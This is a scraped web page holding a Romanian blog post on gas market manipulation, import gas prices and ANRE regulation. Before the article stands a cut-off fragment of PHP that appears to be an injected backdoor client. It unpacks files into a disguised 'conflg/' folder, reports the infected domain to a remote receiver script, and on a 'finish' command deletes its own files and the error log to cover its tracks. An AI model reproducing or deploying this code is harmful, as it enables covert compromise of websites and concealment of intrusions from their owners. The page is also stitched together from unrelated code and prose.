'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Manipularea pieței gazelor | Dumitru Chisalita

Rss

Manipularea pieței gazelor

imagesApreciez ca în ultima perioada s-au lansat importante mesaje subliminale pe piata de gaze cu scopul de a crea un efect de levier.

Astfel, se arata spre ANRE în a interveni în piață și a impune a se achiziționa gaze de import  printr-un coș de gaze care să se vândă pe piață (acțiune care este prevăzută de Legea gazelor, dar care ar fi trebuit să dispară de mult din România, având în vedere modul în care prin această practică s-au asigurat marje importante în contractele de gaze din import.). Motivarea acestei intervenții, brutale în piață, este justificată de un preț mai mic al gazelor din import.

Scopul acestei intervenții (efectul de levier) este de a forța în fapt scăderea prețului gazelor pe piața din România, a obține un preț mai mic al gazelor achiziționate, respectiv a-și mări profitul. Gazele se vând pe piața liberă, la consumatorul final cu până la 108 lei/MWh (fără servicii) în condițiile în care prețul de achiziție, conform site-ului ANRE este de până la 78 lei/MWh. Este adevărat că în dorința acerbă de a-și păstra / câștiga noi clienți au fost înfăptuite greșeli (sau acțiuni anticipate planificat!!!) așa cum a fost încheierea de contracte de către furnizorii en-detail cu prețuri de cca. 63 lei/MWh.

Tranzacțiile de ieri, de pe Bursa din Viena prezintă prețuri ale gazelor de 63,4 lei/MWh (prețuri ale gazelor care pot să fie asimilate cu prețul gazelor de import) doar că ele necesită aplicarea suplimentară a tarifului de rezervare de capacitate de transport la intrarea în România, care variază între (5,22 – 31,15 lei/MWh), ceea ce face ca prețul gazelor din import să ajungă în România la valori de 68,46 – 94,55 lei/MWh.

În ceea ce privește prețul gazelor din import la nivelul iernii 2016-2017, conform prețurilor futures de pe Bursa din Viena, acestea se pot situa în jurul valorii 67,5-76 lei/MWh, respectiv la prețuri de 70,5-79 lei/MWh, ținând cont de costul cu capacitatea de transport la intrarea în România.

Scăderea prețurilor gazelor naturale importate era predictibilă de acum 2 ani chiar dacă se refuza a se observa această evidentă tendință.

Tendința ignorată inclusiv de Normele de aplicare a Codului Fiscal (HG 1/2016), care au impus ca prețul mediu al gazelor naturale din producția internă corespunzătoare cantităților comercializate pe piața concurențială pentru consumatorii noncasnici să nu fie mai mic de 72 lei/MWh, chiar cu riscul de a favoriza achiziția gazelor din import în detrimentul gazelor românești.

Este adevărat că o piață liberalizată are nevoie de reguli, reguli care trebuie sa fie aplicate, instituții care să vegheze la aplicarea și medierea rapidă a neînțelegerilor și conflictelor, reguli care în prima fază crează nemulțumire și chiar costuri (care ar trebui să fie mult mai mici decât costurile nevăzute dar adiționate atent prețurilor reglementate).
Din păcate asa cum încerc să subliniez de câțiva ani prin campania PretCorectLaGaze etapa liberalizării trebuia pregătită prin diseminare masivă.